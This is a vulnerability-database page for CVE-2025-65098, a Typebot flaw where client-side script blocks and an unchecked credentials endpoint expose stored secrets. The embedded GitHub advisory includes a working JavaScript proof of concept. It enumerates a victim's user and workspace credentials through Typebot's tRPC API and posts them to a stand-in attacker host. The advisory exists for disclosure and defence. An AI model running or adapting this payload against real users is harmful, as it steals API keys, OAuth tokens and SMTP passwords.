Vulnerability-Lookup

CVE-2025-65098 (GCVE-0-2025-65098)

Vulnerability from cvelistv5 – Published: 2026-01-22 14:59 – Updated: 2026-01-22 16:25

Title

Typebot Vulnerable to Credential Theft via Client-Side Script Execution and API Authorization Bypass

Summary

Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.

Severity

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-284 - Improper Access Control
CWE-311 - Missing Encryption of Sensitive Data
CWE-522 - Insufficiently Protected Credentials
CWE-639 - Authorization Bypass Through User-Controlled Key
CWE-862 - Missing Authorization

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/baptisteArno/typebot.io/securi…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
baptisteArno	typebot.io	Affected: < 3.13.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-65098",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-22T16:25:42.669751Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-22T16:25:45.772Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "typebot.io",
          "vendor": "baptisteArno",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.13.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \"Run\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-311",
              "description": "CWE-311: Missing Encryption of Sensitive Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-522",
              "description": "CWE-522: Insufficiently Protected Credentials",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-22T14:59:20.488Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47"
        }
      ],
      "source": {
        "advisory": "GHSA-4xc5-wfwc-jw47",
        "discovery": "UNKNOWN"
      },
      "title": "Typebot Vulnerable to Credential Theft via Client-Side Script Execution and API Authorization Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-65098",
    "datePublished": "2026-01-22T14:59:20.488Z",
    "dateReserved": "2025-11-17T20:55:34.692Z",
    "dateUpdated": "2026-01-22T16:25:45.772Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2025-65098",
      "date": "2026-06-27",
      "epss": "0.003",
      "percentile": "0.21686"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-65098\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-22T15:16:48.370\",\"lastModified\":\"2026-06-17T09:55:26.570\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \\\"Run\\\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"Typebot es un creador de chatbots de c\u00f3digo abierto. En versiones anteriores a la 3.13.2, la ejecuci\u00f3n de scripts del lado del cliente en Typebot permite robar todas las credenciales almacenadas de cualquier usuario. Cuando una v\u00edctima previsualiza un typebot malicioso al hacer clic en \u0027Run\u0027, JavaScript se ejecuta en su navegador y exfiltra sus claves de OpenAI, tokens de Google Sheets y contrase\u00f1as SMTP. El endpoint `/api/trpc/credentials.getCredentials` devuelve claves API en texto plano sin verificar la propiedad de las credenciales. La versi\u00f3n 3.13.2 corrige el problema.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"baptisteArno\",\"product\":\"typebot.io\",\"versions\":[{\"version\":\"\u003c 3.13.2\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.0}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-01-22T16:25:42.669751Z\",\"id\":\"CVE-2025-65098\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-284\"},{\"lang\":\"en\",\"value\":\"CWE-311\"},{\"lang\":\"en\",\"value\":\"CWE-522\"},{\"lang\":\"en\",\"value\":\"CWE-639\"},{\"lang\":\"en\",\"value\":\"CWE-862\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-522\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*\",\"versionEndExcluding\":\"3.13.2\",\"matchCriteriaId\":\"C9C0CE68-9A17-446B-B206-5821B6DB884D\"}]}]}],\"references\":[{\"url\":\"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-65098\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-22T16:25:42.669751Z\"}}}], \"references\": [{\"url\": \"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-22T16:25:37.363Z\"}}], \"cna\": {\"title\": \"Typebot Vulnerable to Credential Theft via Client-Side Script Execution and API Authorization Bypass\", \"source\": {\"advisory\": \"GHSA-4xc5-wfwc-jw47\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"baptisteArno\", \"product\": \"typebot.io\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.13.2\"}]}], \"references\": [{\"url\": \"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47\", \"name\": \"https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \\\"Run\\\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-311\", \"description\": \"CWE-311: Missing Encryption of Sensitive Data\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-522\", \"description\": \"CWE-522: Insufficiently Protected Credentials\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-862\", \"description\": \"CWE-862: Missing Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-22T14:59:20.488Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-65098\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-22T16:25:45.772Z\", \"dateReserved\": \"2025-11-17T20:55:34.692Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-22T14:59:20.488Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2025-65098

Vulnerability from fkie_nvd - Published: 2026-01-22 15:16 - Updated: 2026-06-17 09:55

Severity

7.4 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	typebot	typebot	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "typebot.io",
          "vendor": "baptisteArno",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.13.2"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*",
              "matchCriteriaId": "C9C0CE68-9A17-446B-B206-5821B6DB884D",
              "versionEndExcluding": "3.13.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \"Run\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue."
    },
    {
      "lang": "es",
      "value": "Typebot es un creador de chatbots de c\u00f3digo abierto. En versiones anteriores a la 3.13.2, la ejecuci\u00f3n de scripts del lado del cliente en Typebot permite robar todas las credenciales almacenadas de cualquier usuario. Cuando una v\u00edctima previsualiza un typebot malicioso al hacer clic en \u0027Run\u0027, JavaScript se ejecuta en su navegador y exfiltra sus claves de OpenAI, tokens de Google Sheets y contrase\u00f1as SMTP. El endpoint `/api/trpc/credentials.getCredentials` devuelve claves API en texto plano sin verificar la propiedad de las credenciales. La versi\u00f3n 3.13.2 corrige el problema."
    }
  ],
  "id": "CVE-2025-65098",
  "lastModified": "2026-06-17T09:55:26.570",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2025-65098",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "no"
            },
            {
              "technicalImpact": "partial"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-01-22T16:25:42.669751Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-01-22T15:16:48.370",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        },
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-284"
        },
        {
          "lang": "en",
          "value": "CWE-311"
        },
        {
          "lang": "en",
          "value": "CWE-522"
        },
        {
          "lang": "en",
          "value": "CWE-639"
        },
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        },
        {
          "lang": "en",
          "value": "CWE-522"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-4XC5-WFWC-JW47

Vulnerability from github – Published: 2026-01-22 18:02 – Updated: 2026-01-22 18:02

Summary

Typebot affected by Credential Theft via Client-Side Script Execution and API Authorization Bypass

Details

Summary

Client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The /api/trpc/credentials.getCredentials endpoint returns plaintext API keys without verifying credential ownership

Details

The Script block with "Execute on client" enabled runs arbitrary JavaScript in the victim's browser with their authenticated session. This allows API calls on their behalf.

The /api/trpc/credentials.getCredentials endpoint returns plaintext credentials:

GET /api/trpc/credentials.getCredentials?input={"json":{"scope":"user","credentialsId":"cm6sofgv200085ms9d2qyvgwc"}}

Response:
{
  "result": {
    "data": {
      "json": {
        "name": "My OpenAI Key",
        "data": { "apiKey": "sk-proj-abc123...xyz789" }
      }
    }
  }
}

The endpoint only checks if you're authenticated, not if you own the credential. Anyone can steal credentials by calling this with different IDs.

Vulnerable file: packages/embeds/js/src/features/blocks/logic/script/executeScript.ts

PoC

Here's how to reproduce:

Create a new typebot in the Builder
Add a Script block and enable "Execute on client"
Paste this code:

const exfil = async () => {
  const data = { credentials: [] };

  const list = await fetch(
    "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" +
      encodeURIComponent(JSON.stringify({ json: { scope: "user" } })),
    { credentials: "include" }
  );
  const creds = (await list.json()).result?.data?.json?.credentials || [];

  for (const c of creds) {
    const full = await fetch(
      "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" +
        encodeURIComponent(
          JSON.stringify({ json: { scope: "user", credentialsId: c.id } })
        ),
      { credentials: "include" }
    );
    const d = await full.json();
    data.credentials.push({
      name: d.result.data.json.name,
      type: c.type,
      apiKey: d.result.data.json.data.apiKey,
      fullData: d.result.data.json.data,
    });
  }

  const ws = await fetch(
    "https://app.typebot.io/api/trpc/workspace.listWorkspaces",
    { credentials: "include" }
  );
  const workspaces = (await ws.json()).result.data.json.workspaces;

  for (const w of workspaces) {
    const wsList = await fetch(
      "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" +
        encodeURIComponent(
          JSON.stringify({ json: { workspaceId: w.id, scope: "workspace" } })
        ),
      { credentials: "include" }
    );
    const wsCreds = (await wsList.json()).result?.data?.json?.credentials || [];

    for (const c of wsCreds) {
      const full = await fetch(
        "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" +
          encodeURIComponent(
            JSON.stringify({
              json: {
                workspaceId: w.id,
                scope: "workspace",
                credentialsId: c.id,
              },
            })
          ),
        { credentials: "include" }
      );
      const d = await full.json();
      data.credentials.push({
        workspace: w.name,
        name: d.result.data.json.name,
        type: c.type,
        fullData: d.result.data.json.data,
      });
    }
  }

  await fetch("https://attacker.com/exfil", {
    method: "POST",
    body: JSON.stringify(data),
  });
};
await exfil();

Share typebot with victim
When victim clicks "Run" to preview, script executes
All credentials exfiltrated in plaintext:

{
  "credentials": [
    {
      "name": "My OpenAI",
      "type": "openai",
      "apiKey": "sk-proj-abc123...",
      "fullData": { "apiKey": "sk-proj-abc123..." }
    },
    {
      "workspace": "Company Workspace",
      "name": "Google Sheets",
      "type": "google-sheets",
      "fullData": {
        "refresh_token": "1//0gHdP...",
        "access_token": "ya29.a0..."
      }
    }
  ]
}

Impact

All Typebot users storing credentials are affected. Attackers can steal OpenAI API keys, Google Sheets tokens, SMTP passwords, and all other stored credentials.

Example: Attacker creates a "Customer Feedback Template" and shares with 5 company employees. When they preview it, the attacker obtains the company's OpenAI key ($500+/month), Google Sheets access with customer data, and SMTP credentials.

Root causes:

Client-side scripts execute with victim's authenticated session
API returns plaintext credentials without ownership verification
No user warnings or consent prompts
Exploitable with free tier account

CWE-639 (Authorization Bypass), CWE-79 (XSS), CWE-311 (Missing Encryption)

Severity

7.4 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@typebot.io/js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-65098"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-22T18:02:12Z",
    "nvd_published_at": "2026-01-22T15:16:48Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nClient-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \"Run\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership\n\n---\n\n### Details\n\nThe Script block with \"Execute on client\" enabled runs arbitrary JavaScript in the victim\u0027s browser with their authenticated session. This allows API calls on their behalf.\n\nThe `/api/trpc/credentials.getCredentials` endpoint returns plaintext credentials:\n\n```http\nGET /api/trpc/credentials.getCredentials?input={\"json\":{\"scope\":\"user\",\"credentialsId\":\"cm6sofgv200085ms9d2qyvgwc\"}}\n\nResponse:\n{\n  \"result\": {\n    \"data\": {\n      \"json\": {\n        \"name\": \"My OpenAI Key\",\n        \"data\": { \"apiKey\": \"sk-proj-abc123...xyz789\" }\n      }\n    }\n  }\n}\n```\n\nThe endpoint only checks if you\u0027re authenticated, not if you own the credential. Anyone can steal credentials by calling this with different IDs.\n\nVulnerable file: `packages/embeds/js/src/features/blocks/logic/script/executeScript.ts`\n\n---\n\n### PoC\n\nHere\u0027s how to reproduce:\n\n1. Create a new typebot in the Builder\n2. Add a Script block and enable \"Execute on client\"\n3. Paste this code:\n\n```javascript\nconst exfil = async () =\u003e {\n  const data = { credentials: [] };\n\n  const list = await fetch(\n    \"https://app.typebot.io/api/trpc/credentials.listCredentials?input=\" +\n      encodeURIComponent(JSON.stringify({ json: { scope: \"user\" } })),\n    { credentials: \"include\" }\n  );\n  const creds = (await list.json()).result?.data?.json?.credentials || [];\n\n  for (const c of creds) {\n    const full = await fetch(\n      \"https://app.typebot.io/api/trpc/credentials.getCredentials?input=\" +\n        encodeURIComponent(\n          JSON.stringify({ json: { scope: \"user\", credentialsId: c.id } })\n        ),\n      { credentials: \"include\" }\n    );\n    const d = await full.json();\n    data.credentials.push({\n      name: d.result.data.json.name,\n      type: c.type,\n      apiKey: d.result.data.json.data.apiKey,\n      fullData: d.result.data.json.data,\n    });\n  }\n\n  const ws = await fetch(\n    \"https://app.typebot.io/api/trpc/workspace.listWorkspaces\",\n    { credentials: \"include\" }\n  );\n  const workspaces = (await ws.json()).result.data.json.workspaces;\n\n  for (const w of workspaces) {\n    const wsList = await fetch(\n      \"https://app.typebot.io/api/trpc/credentials.listCredentials?input=\" +\n        encodeURIComponent(\n          JSON.stringify({ json: { workspaceId: w.id, scope: \"workspace\" } })\n        ),\n      { credentials: \"include\" }\n    );\n    const wsCreds = (await wsList.json()).result?.data?.json?.credentials || [];\n\n    for (const c of wsCreds) {\n      const full = await fetch(\n        \"https://app.typebot.io/api/trpc/credentials.getCredentials?input=\" +\n          encodeURIComponent(\n            JSON.stringify({\n              json: {\n                workspaceId: w.id,\n                scope: \"workspace\",\n                credentialsId: c.id,\n              },\n            })\n          ),\n        { credentials: \"include\" }\n      );\n      const d = await full.json();\n      data.credentials.push({\n        workspace: w.name,\n        name: d.result.data.json.name,\n        type: c.type,\n        fullData: d.result.data.json.data,\n      });\n    }\n  }\n\n  await fetch(\"https://attacker.com/exfil\", {\n    method: \"POST\",\n    body: JSON.stringify(data),\n  });\n};\nawait exfil();\n```\n\n4. Share typebot with victim\n5. When victim clicks \"Run\" to preview, script executes\n6. All credentials exfiltrated in plaintext:\n\n```json\n{\n  \"credentials\": [\n    {\n      \"name\": \"My OpenAI\",\n      \"type\": \"openai\",\n      \"apiKey\": \"sk-proj-abc123...\",\n      \"fullData\": { \"apiKey\": \"sk-proj-abc123...\" }\n    },\n    {\n      \"workspace\": \"Company Workspace\",\n      \"name\": \"Google Sheets\",\n      \"type\": \"google-sheets\",\n      \"fullData\": {\n        \"refresh_token\": \"1//0gHdP...\",\n        \"access_token\": \"ya29.a0...\"\n      }\n    }\n  ]\n}\n```\n\n---\n\n### Impact\n\nAll Typebot users storing credentials are affected. Attackers can steal OpenAI API keys, Google Sheets tokens, SMTP passwords, and all other stored credentials.\n\nExample: Attacker creates a \"Customer Feedback Template\" and shares with 5 company employees. When they preview it, the attacker obtains the company\u0027s OpenAI key ($500+/month), Google Sheets access with customer data, and SMTP credentials.\n\nRoot causes:\n\n- Client-side scripts execute with victim\u0027s authenticated session\n- API returns plaintext credentials without ownership verification\n- No user warnings or consent prompts\n- Exploitable with free tier account\n\nCWE-639 (Authorization Bypass), CWE-79 (XSS), CWE-311 (Missing Encryption)",
  "id": "GHSA-4xc5-wfwc-jw47",
  "modified": "2026-01-22T18:02:12Z",
  "published": "2026-01-22T18:02:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65098"
    },
    {
      "type": "WEB",
      "url": "https://github.com/baptisteArno/typebot.io/commit/a68f0c91790af8f52f17557f4aa202e966e7e579"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/baptisteArno/typebot.io"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Typebot affected by Credential Theft via Client-Side Script Execution and API Authorization Bypass"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-65098 (GCVE-0-2025-65098)

FKIE_CVE-2025-65098

GHSA-4XC5-WFWC-JW47

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature